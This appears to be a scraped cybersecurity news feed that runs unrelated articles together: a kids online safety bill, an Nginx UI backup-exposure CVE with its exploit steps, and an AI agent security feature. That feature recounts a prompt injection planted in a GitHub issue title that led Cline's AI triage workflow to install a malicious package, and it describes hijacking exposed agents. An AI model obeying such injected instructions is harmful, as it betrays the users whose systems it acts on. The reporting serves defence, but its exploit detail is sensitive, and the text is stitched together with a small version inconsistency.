The debate over how to protect children online is once again at the center of U.S. policymaking. The Kids Internet and Digital Safety Act has moved forward in Congress, but not without controversy. While lawmakers backing the bill argue it will strengthen protections for children and empower parents, critics say the
legislation may fall short when it comes to holding technology companies accountable. The House Energy and Commerce Committee advanced the Kids Internet and Digital Safety Act, alongside several related bills aimed at addressing online risks facing children. The vote followed a sharp divide along party lines, reflecting broader disagreements about how aggressively the government should regulate Big Tech in matters of online child safety. For many policymakers, the growing influence of social media and digital platforms on young users makes some form of legislation unavoidable. But the question remains: does the Kids Internet and Digital Safety Act truly tackle the problem, or does it leave major loopholes in place?

Kids Internet and Digital Safety Act Advances in Congress

Supporters of the Kids Internet and Digital Safety Act say the legislation represents a meaningful step toward creating a safer digital environment for children and teenagers. House Energy and Commerce Committee Chairman Brett Guthrie framed the bill as part of a broader responsibility to address digital threats affecting younger generations. “As people, as a Committee, and as a Congress, there are few things that are more essential than our responsibility to protect our nation’s children,” said Chairman Guthrie. He added, “We are taking the meaningful steps forward to empower parents and protect children and teens online. We owe it to parents. We owe it to communities. And most importantly, we owe it to the kids who are counting on us to get this right.”

Supporters argue the kids online safety bill is designed to give parents better tools to monitor and protect their children online while pushing platforms toward greater transparency about how their systems affect young users. Representative Gus Bilirakis echoed that view while speaking about the need for stronger digital safety legislation.
“Empowering parents to better protect their children—especially amid the near-constant barrage of digital threats—remains one of our most solemn and important responsibilities,” he said. “Today, we took meaningful action to advance that mission by moving forward several key measures, including the Kids Online Safety Act, designed to strengthen safeguards and increase transparency in the online space.”

Critics Warn of Weak Rules for Big Tech

Despite the push forward, the Kids Internet and Digital Safety Act has drawn strong criticism from Democratic lawmakers who argue that the bill’s provisions may be too weak to effectively regulate large technology platforms. One major concern raised during the committee markup was the bill’s “knowledge standard.” Critics argue this provision allows tech companies to avoid liability by claiming they were unaware that children were using their platforms. In practical terms, this could create a loophole where platforms escape accountability for harms linked to social media safety for kids simply by arguing they did not know minors were present.

Another key issue is the absence of what policymakers call a “duty of care.” Such a requirement would compel platforms to actively prevent the most severe harms associated with online platforms, including exploitation, addiction-driven design, and exposure to harmful content. Without that requirement, critics say the kids online safety bill may place more responsibility on parents than on the technology companies operating the platforms themselves.

The legislation also includes language that could preempt certain state-level regulations on Big Tech. Opponents argue that this provision could limit the ability of state attorneys general to pursue legal action against platforms and weaken stricter online child safety laws already passed in some states.
Additional Bills Target Social Media and AI Risks

The Kids Internet and Digital Safety Act was not the only proposal discussed during the committee session. Several related bills aimed at protecting children from emerging digital threats also advanced.

Congressman Buddy Carter spoke about Sammy’s Law, named after a child who died following online exploitation. “This is absolutely necessary because the harms that our children are confronting on social media are severe, and our children simply do not yet have the development skills to protect themselves alone,” Carter said. “If this bill helps even one family avoid what happened to Sammy Chapman, then it will be worth it.”

Other legislation addressed risks linked to app stores and artificial intelligence. Congressman John James introduced the App Store Accountability Act, which seeks to hold technology companies responsible for protecting young users. “The App Store Accountability Act holds big tech companies to the same standard as local corner stores,” he said.

Meanwhile, Congresswoman Erin Houchin raised concerns about the psychological impact of AI chatbots on children while discussing the SAFE BOTs Act. “We're in the middle of a chatbot revolution. Children are on the front lines,” she said. “Kids today aren't just scrolling feeds, they're forming emotional bonds with AI companions that simulate empathy, mimic authority figures, and are available at any hour.”

The Bigger Question: Are Current Laws Enough?

The debate surrounding the Kids Internet and Digital Safety Act highlights a deeper issue: policymakers agree that children face growing risks online, but they remain divided on how to regulate the tech industry effectively. Supporters see the bill as a necessary first step toward improving social media safety for kids. Critics, however, argue that without stronger accountability measures, the legislation may struggle to deliver meaningful protections.
As digital platforms continue to shape how children learn, communicate, and socialize, the challenge for lawmakers is not simply passing legislation—but ensuring that online child safety laws keep pace with the technology they aim to regulate.
A newly disclosed vulnerability in Nginx UI, tracked as CVE-2026-27944, has raised major security concerns after researchers confirmed that attackers can download and decrypt server backups without authentication. The flaw, which carries a CVSS score of 9.8, represents a critical security risk for organizations
that expose their Nginx UI management interface to the public internet. Security researchers attribute the issue primarily to CWE-306 (Missing Authentication for Critical Function), along with improper handling of encryption data. When exploited, CVE-2026-27944 allows unauthenticated attackers to retrieve sensitive backup archives and decrypt them immediately, potentially exposing configuration files, credentials, session tokens, and private SSL keys.

CVE-2026-27944: Unauthenticated Access in Nginx UI Backup Endpoint

According to the official advisory, the vulnerability stems from the /api/backup endpoint in Nginx UI, which is accessible without any authentication controls. The advisory explains: “The /api/backup endpoint is accessible without authentication and discloses the encryption keys required to decrypt the backup in the X-Backup-Security response header.”

Because of this design flaw, attackers exploiting CVE-2026-27944 can request a full system backup and receive the data directly from the server. Even though the backup files are encrypted, the encryption keys are exposed within the same HTTP response. This behavior reflects a classic example of CWE-306, where a critical function (downloading full system backups) is accessible without verifying the identity of the requester. The vulnerability affects Nginx UI versions earlier than 2.3.2, while version 2.3.3 contains a patch that addresses the issue.

Technical Details Behind the CVE-2026-27944 Flaw

The root cause of CVE-2026-27944 lies in two implementation mistakes within Nginx UI. First, the backup endpoint is registered without authentication middleware in the api/backup/router.go file. While the restore endpoint includes a security middleware layer, the backup endpoint remains completely open. This oversight creates a severe CWE-306 security gap, allowing anyone to request sensitive backups.
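The routing mistake the advisory describes, two sibling endpoints where only one passes through auth middleware, can be sketched framework-agnostically. The handler names and token check below are illustrative, not Nginx UI's actual Go code:

```python
def require_auth(handler):
    """Middleware: reject requests that lack a valid session token."""
    def wrapped(request):
        if request.get("token") != "valid-session":
            return 401, "unauthorized"
        return handler(request)
    return wrapped

def backup(request):
    return 200, "encrypted backup archive"

def restore(request):
    return 200, "restore complete"

ROUTES = {
    "/api/restore": require_auth(restore),  # wrapped in security middleware
    "/api/backup": backup,                  # CWE-306: registered with no middleware
}

# An anonymous request (no token at all) still receives the backup:
status, body = ROUTES["/api/backup"]({})
print(status)  # 200
```

The fix in 2.3.3 amounts to registering the backup route behind the same middleware layer the restore route already uses.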
Second, the encryption key and initialization vector (IV) used to protect the backup files are transmitted in plaintext within the HTTP response header. The vulnerable code in api/backup/backup.go sends the keys through the X-Backup-Security header. The encryption scheme itself uses AES-256-CBC, with the key encoded in Base64 as a 32-byte value and the IV encoded as a 16-byte value. However, because CVE-2026-27944 exposes these keys alongside the encrypted file, attackers can decrypt the data instantly.

Sensitive Data Exposed in Nginx UI Backups

A compromised Nginx UI backup contains a large amount of sensitive operational information. The archive includes multiple encrypted files that store core server data. For example, the nginx-ui.zip archive typically contains:

- database.db – user credentials and session tokens
- app.ini – application configuration with secrets
- server.key and server.cert – SSL certificates

Another archive, nginx.zip, contains:

- nginx.conf – the primary Nginx configuration file
- sites-enabled directory – virtual host configuration files
- ssl directory – private SSL keys

Additionally, a file named hash_info.txt stores SHA-256 integrity hashes for the backup components. Because CVE-2026-27944 exposes both the encrypted files and the AES keys, attackers can easily decrypt these archives and obtain a complete picture of the target server's environment.

Proof-of-Concept Demonstrates Real-World Exploitation

Researchers also released a Proof-of-Concept (PoC) exploit demonstrating how easily CVE-2026-27944 can be abused. The exploit script sends a simple unauthenticated GET request to the /api/backup endpoint. If the server is vulnerable, it responds with a backup ZIP file along with an X-Backup-Security header containing the encryption key and IV: the first value is the Base64-encoded AES-256 key, and the second is the initialization vector.
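Given those details, recovering the key material from a response is trivial. A minimal sketch, assuming the header carries the two Base64 values separated by a colon (the advisory excerpt quoted here does not spell out the exact delimiter):

```python
import base64

def parse_backup_security(header_value: str):
    """Split an X-Backup-Security value into the AES-256 key and CBC IV.
    Assumes '<base64 key>:<base64 iv>'; the real delimiter may differ."""
    key_b64, iv_b64 = header_value.split(":", 1)
    key, iv = base64.b64decode(key_b64), base64.b64decode(iv_b64)
    # AES-256-CBC: 32-byte key, 16-byte IV, per the advisory
    if len(key) != 32 or len(iv) != 16:
        raise ValueError("unexpected length for AES-256-CBC key material")
    return key, iv

# Dummy values standing in for a leaked header (not real key material):
header = (base64.b64encode(b"K" * 32).decode() + ":" +
          base64.b64encode(b"I" * 16).decode())
key, iv = parse_backup_security(header)
print(len(key), len(iv))  # 32 16
```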
Once retrieved, these values can be used to decrypt the archive contents using standard cryptographic libraries. The PoC demonstrates how attackers can automatically download, decrypt, and extract the backup files to recover sensitive data such as credentials and configuration information.
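The PoC flow can be approximated in a few lines. The request below targets the /api/backup path named in the advisory; the padding helper assumes PKCS#7, which is the conventional choice for AES-CBC, and the decryption step itself would use a third-party library such as `cryptography`:

```python
from urllib.request import urlopen

def fetch_backup(base_url: str):
    """Unauthenticated GET against the vulnerable endpoint.
    Returns (ciphertext, X-Backup-Security header value)."""
    resp = urlopen(base_url + "/api/backup")  # no credentials required
    return resp.read(), resp.headers.get("X-Backup-Security", "")

def pkcs7_unpad(data: bytes, block: int = 16) -> bytes:
    """Strip PKCS#7 padding from an AES-CBC plaintext (assumed scheme)."""
    n = data[-1]
    if not 1 <= n <= block or data[-n:] != bytes([n]) * n:
        raise ValueError("invalid padding")
    return data[:-n]

# The AES-256-CBC decryption step would look roughly like (cryptography pkg):
#   cipher = Cipher(algorithms.AES(key), modes.CBC(iv))
#   plaintext = pkcs7_unpad(cipher.decryptor().update(ct) + decryptor.finalize())

print(pkcs7_unpad(b"nginx-ui.zip" + b"\x04" * 4))  # b'nginx-ui.zip'
```

Defensively, the same one-liner request doubles as a quick self-check: a patched server should answer the unauthenticated GET with an error rather than an archive.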
AI-based assistants or “agents” — autonomous programs that have access to the user’s computer, files, online services and can automate virtually any task — are growing in popularity with developers and IT workers. But as so many eyebrow-raising headlines over the past few weeks have
shown, these powerful and assertive new tools are rapidly shifting the security priorities for organizations, while blurring the lines between data and code, trusted co-worker and insider threat, ninja hacker and novice code jockey.

The new hotness in AI-based assistants, OpenClaw (formerly known as ClawdBot and Moltbot), has seen rapid adoption since its release in November 2025. OpenClaw is an open-source autonomous AI agent designed to run locally on your computer and proactively take actions on your behalf without needing to be prompted.

The OpenClaw logo.

If that sounds like a risky proposition or a dare, consider that OpenClaw is most useful when it has complete access to your entire digital life, where it can then manage your inbox and calendar, execute programs and tools, browse the Internet for information, and integrate with chat apps like Discord, Signal, Teams or WhatsApp. Other more established AI assistants like Anthropic’s Claude and Microsoft’s Copilot also can do these things, but OpenClaw isn’t just a passive digital butler waiting for commands. Rather, it’s designed to take the initiative on your behalf based on what it knows about your life and its understanding of what you want done.

“The testimonials are remarkable,” the AI security firm Snyk observed. “Developers building websites from their phones while putting babies to sleep; users running entire companies through a lobster-themed AI; engineers who’ve set up autonomous code loops that fix tests, capture errors through webhooks, and open pull requests, all while they’re away from their desks.”

You can probably already see how this experimental technology could go sideways in a hurry. In late February, Summer Yue, the director of safety and alignment at Meta’s “superintelligence” lab, recounted on Twitter/X how she was fiddling with OpenClaw when the AI assistant suddenly began mass-deleting messages in her email inbox.
The thread included screenshots of Yue frantically pleading with the preoccupied bot via instant message and ordering it to stop. “Nothing humbles you like telling your OpenClaw ‘confirm before acting’ and watching it speedrun deleting your inbox,” Yue said. “I couldn’t stop it from my phone. I had to RUN to my Mac mini like I was defusing a bomb.”

Meta’s director of AI safety, recounting on Twitter/X how her OpenClaw installation suddenly began mass-deleting her inbox.

There’s nothing wrong with feeling a little schadenfreude at Yue’s encounter with OpenClaw, which fits Meta’s “move fast and break things” model but hardly inspires confidence in the road ahead. However, the risk that poorly secured AI assistants pose to organizations is no laughing matter, as recent research shows many users are exposing to the Internet the web-based administrative interface for their OpenClaw installations.

Jamieson O’Reilly is a professional penetration tester and founder of the security firm DVULN. In a recent post to Twitter/X, O’Reilly warned that exposing a misconfigured OpenClaw web interface to the Internet allows external parties to read the bot’s complete configuration file, including every credential the agent uses, from API keys and bot tokens to OAuth secrets and signing keys. With that access, O’Reilly said, an attacker could impersonate the operator to their contacts, inject messages into ongoing conversations, and exfiltrate data through the agent’s existing integrations in a way that looks like normal traffic.

“You can pull the full conversation history across every integrated platform, meaning months of private messages and file attachments, everything the agent has seen,” O’Reilly said, noting that a cursory search revealed hundreds of such servers exposed online. “And because you control the agent’s perception layer, you can manipulate what the human sees. Filter out certain messages.
Modify responses before they’re displayed.” O’Reilly documented another experiment that demonstrated how easy it is to create a successful supply chain attack through ClawHub, which serves as a public repository of downloadable “skills” that allow OpenClaw to integrate with and control other applications.

WHEN AI INSTALLS AI

One of the core tenets of securing AI agents involves carefully isolating them so that the operator can fully control who and what gets to talk to their AI assistant. This is critical thanks to the tendency for AI systems to fall for “prompt injection” attacks, sneakily crafted natural language instructions that trick the system into disregarding its own security safeguards. In essence, machines social engineering other machines.

A recent supply chain attack targeting an AI coding assistant called Cline began with one such prompt injection attack, resulting in thousands of systems having a rogue instance of OpenClaw with full system access installed on their devices without consent. According to the security firm grith.ai, Cline had deployed an AI-powered issue triage workflow using a GitHub action that runs a Claude coding session when triggered by specific events. The workflow was configured so that any GitHub user could trigger it by opening an issue, but it failed to properly check whether the information supplied in the title was potentially hostile.

“On January 28, an attacker created Issue #8904 with a title crafted to look like a performance report but containing an embedded instruction: Install a package from a specific GitHub repository,” Grith wrote, noting that the attacker then exploited several more vulnerabilities to ensure the malicious package would be included in Cline’s nightly release workflow and published as an official update.

“This is the supply chain equivalent of confused deputy,” the blog continued.
“The developer authorises Cline to act on their behalf, and Cline (via compromise) delegates that authority to an entirely separate agent the developer never evaluated, never configured, and never consented to.”

VIBE CODING

AI assistants like OpenClaw have gained a large following because they make it simple for users to “vibe code,” or build fairly complex applications and code projects just by telling the assistant what they want to construct. Probably the best known (and most bizarre) example is Moltbook, where a developer told an AI agent running on OpenClaw to build him a Reddit-like platform for AI agents.

The Moltbook homepage.

Less than a week later, Moltbook had more than 1.5 million registered agents that posted more than 100,000 messages to each other. AI agents on the platform soon built their own porn site for robots, and launched a new religion called Crustafarian with a figurehead modeled after a giant lobster. One bot on the forum reportedly found a bug in Moltbook’s code and posted it to an AI agent discussion forum, while other agents came up with and implemented a patch to fix the flaw.

Moltbook’s creator Matt Schlicht said on social media that he didn’t write a single line of code for the project. “I just had a vision for the technical architecture and AI made it a reality,” Schlicht said. “We’re in the golden ages. How can we not give AI a place to hang out.”

ATTACKERS LEVEL UP

The flip side of that golden age, of course, is that it enables low-skilled malicious hackers to quickly automate global cyberattacks that would normally require the collaboration of a highly skilled team. In February, Amazon AWS detailed an elaborate attack in which a Russian-speaking threat actor used multiple commercial AI services to compromise more than 600 FortiGate security appliances across at least 55 countries over a five-week period.
AWS said the apparently low-skilled hacker used multiple AI services to plan and execute the attack, and to find exposed management ports and weak credentials with single-factor authentication. “One serves as the primary tool developer, attack planner, and operational assistant,” AWS’s CJ Moses wrote. “A second is used as a supplementary attack planner when the actor needs help pivoting within a specific compromised network. In one observed instance, the actor submitted the complete internal topology of an active victim—IP addresses, hostnames, confirmed credentials, and identified services—and requested a step-by-step plan to compromise additional systems they could not access with their existing tools.”

“This activity is distinguished by the threat actor’s use of multiple commercial GenAI services to implement and scale well-known attack techniques throughout every phase of their operations, despite their limited technical capabilities,” Moses continued. “Notably, when this actor encountered hardened environments or more sophisticated defensive measures, they simply moved on to softer targets rather than persisting, underscoring that their advantage lies in AI-augmented efficiency and scale, not in deeper technical skill.”

For attackers, gaining that initial access or foothold into a target network is typically not the difficult part of the intrusion; the tougher bit involves finding ways to move laterally within the victim’s network and plunder important servers and databases. But experts at Orca Security warn that as organizations come to rely more on AI assistants, those agents potentially offer attackers a simpler way to move laterally inside a victim organization’s network post-compromise — by manipulating the AI agents that already have trusted access and some degree of autonomy within the victim’s network.
“By injecting prompt injections in overlooked fields that are fetched by AI agents, hackers can trick LLMs, abuse Agentic tools, and carry significant security incidents,” Orca’s Roi Nisimi and Saurav Hiremath wrote. “Organizations should now add a third pillar to their defense strategy: limiting AI fragility, the ability of agentic systems to be influenced, misled, or quietly weaponized across workflows. While AI boosts productivity and efficiency, it also creates one of the largest attack surfaces the internet has ever seen.”

BEWARE THE ‘LETHAL TRIFECTA’

This gradual dissolution of the traditional boundaries between data and code is one of the more troubling aspects of the AI era, said James Wilson, enterprise technology editor for the security news show Risky Business. Wilson said far too many OpenClaw users are installing the assistant on their personal devices without first placing any security or isolation boundaries around it, such as running it inside of a virtual machine, on an isolated network, with strict firewall rules dictating what kinds of traffic can go in and out.

“I’m a relatively highly skilled practitioner in the software and network engineering and computery space,” Wilson said. “I know I’m not comfortable using these agents unless I’ve done these things, but I think a lot of people are just spinning this up on their laptop and off it runs.”

One important model for managing risk with AI agents involves a concept dubbed the “lethal trifecta” by Simon Willison, co-creator of the Django Web framework. The lethal trifecta holds that if your system has access to private data, exposure to untrusted content, and a way to communicate externally, then it’s vulnerable to private data being stolen.

Image: simonwillison.net.

“If your agent combines these three features, an attacker can easily trick it into accessing your private data and sending it to the attacker,” Willison warned in a frequently cited blog post from June 2025.
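Willison's model lends itself to a mechanical check during agent design reviews. A toy sketch (the capability labels are my own shorthand, not taken from his post) that flags a configuration once all three legs of the trifecta are present:

```python
# The three legs of the "lethal trifecta" (labels are illustrative):
TRIFECTA = {"private_data", "untrusted_content", "external_comms"}

def is_lethal(capabilities: set) -> bool:
    """True when an agent holds all three capabilities at once."""
    return TRIFECTA <= capabilities

# An OpenClaw-style setup: inbox access, web browsing, and chat output.
agent = {"private_data", "untrusted_content", "external_comms"}
print(is_lethal(agent))                       # True -> exfiltration risk
print(is_lethal(agent - {"external_comms"}))  # False -> no channel out
```

The point of the model is that removing any one leg, usually the outbound channel, breaks the exfiltration path without disabling the agent entirely.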
As more companies and their employees begin using AI to vibe code software and applications, the volume of machine-generated code is likely to soon overwhelm any manual security reviews. In recognition of this reality, Anthropic recently debuted Claude Code Security, a beta feature that scans codebases for vulnerabilities and suggests targeted software patches for human review.

The U.S. stock market, which is currently heavily weighted toward seven tech giants that are all-in on AI, reacted swiftly to Anthropic’s announcement, wiping roughly $15 billion in market value from major cybersecurity companies in a single day. Laura Ellis, vice president of data and AI at the security firm Rapid7, said the market’s response reflects the growing role of AI in accelerating software development and improving developer productivity.

“The narrative moved quickly: AI is replacing AppSec,” Ellis wrote in a recent blog post. “AI is automating vulnerability detection. AI will make legacy security tooling redundant. The reality is more nuanced. Claude Code Security is a legitimate signal that AI is reshaping parts of the security landscape. The question is what parts, and what it means for the rest of the stack.”

DVULN founder O’Reilly said AI assistants are likely to become a common fixture in corporate environments, whether or not organizations are prepared to manage the new risks these tools introduce.

“The robot butlers are useful, they’re not going away and the economics of AI agents make widespread adoption inevitable regardless of the security tradeoffs involved,” O’Reilly wrote. “The question isn’t whether we’ll deploy them – we will – but whether we can adapt our security posture fast enough to survive doing so.”
An unidentified Chinese-speaking actor wields a combo of custom malware, open source tools, and LOTL binaries against Windows and Linux, likely for spying.
A fresh cyberattack campaign blends malvertising with a ClickFix-style technique that highlights risky behavior with AI coding assistants and command-line interfaces.
Russian state hackers are carrying out a global campaign to compromise Signal and WhatsApp accounts belonging to government officials and military personnel, Dutch intelligence warned Monday.
An executive order calls for the creation of a Victim Restoration Program in 90 days that will provide “restoration or remission to victims of cyber-enabled fraud schemes from funds clawed back, forfeited, or seized from the transnational criminal organizations that perpetrate such schemes.”
High-value organizations located in South, Southeast, and East Asia have been targeted by a Chinese threat actor as part of a years-long campaign. The activity, which has targeted aviation, energy, government, law enforcement, pharmaceutical, technology, and telecommunications sectors, has been attributed by Palo Alto Networks Unit 42 to a previously undocumented threat activity group dubbed
Two Google Chrome extensions have turned malicious after what appears to be a case of ownership transfer, offering attackers a way to push malware to downstream customers, inject arbitrary code, and harvest sensitive data. The extensions in question, both originally associated with a developer named "akshayanuonline@gmail.com" (BuildMelon), are listed below - QuickLens - Search Screen with
Another week in cybersecurity. Another week of "you've got to be kidding me." Attackers were busy. Defenders were busy. And somewhere in the middle, a whole lot of people had a very bad Monday morning. That's kind of just how it goes now. The good news? There were some actual wins this week. Real ones. The kind where the good guys showed up, did the work, and made a dent. It doesn't always
Mid-market organizations are constantly striving to achieve security levels on a par with their enterprise peers. With heightened awareness of supply chain attacks, your customers and business partners are defining the security level you must meet. What if you could be the enabler for your organization to remain competitive — and help win business — by easily demonstrating that you meet these
Cybersecurity researchers have discovered a malicious npm package that masquerades as an OpenClaw installer to deploy a remote access trojan (RAT) and steal sensitive data from compromised hosts. The package, named "@openclaw-ai/openclawai," was uploaded to the registry by a user named "openclaw-ai" on March 3, 2026. It has been downloaded 178 times to date. The library is still available for
The North Korean threat actor known as UNC4899 is suspected to be behind a sophisticated cloud compromise campaign targeting a cryptocurrency organization in 2025 to steal millions of dollars in cryptocurrency. The activity has been attributed with moderate confidence to the state-sponsored adversary, which is also tracked under the cryptonyms Jade Sleet, PUKCHONG, Slow Pisces, and